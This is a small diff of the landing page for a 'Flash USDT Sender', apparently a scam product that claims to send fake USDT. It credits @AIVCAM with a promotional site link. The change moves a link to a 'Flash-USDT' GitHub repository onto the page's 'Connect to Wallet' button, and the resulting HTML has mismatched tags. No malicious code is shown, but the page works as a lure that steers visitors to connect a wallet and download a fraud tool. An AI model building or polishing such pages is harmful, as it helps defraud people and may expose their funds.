BY : @AIVCAM --> Website : https://vcam.live

--- a/index.html
+++ b/index.html
@@ -21,16 +21,16 @@
      <h1 class="text-3xl font-bold">
       Flash USDT Sender
      </h1>
-      <a href="https://github.com/VCamPro/Flash-USDT"><p class="text-gray-600">
+     <p class="text-gray-600">
       Connect to your Wallet
      </a></p>
      <p class="text-gray-600">
       Start sending USDT
      </p>
-     <button class="bg-green-500 text-white px-4 py-2 rounded-md mt-2 flex items-center">
-      Connect to Wallet
+     <a href="https://github.com/VCamPro/Flash-USDT"> <button class="bg-green-500 text-white px-4 py-2 rounded-md mt-2 flex items-center">
+      Connect to Wallet 
       <i class="fas fa-lock ml-2">
-      </i>
+      </i></a>
      </button>
     </div>
    </div>
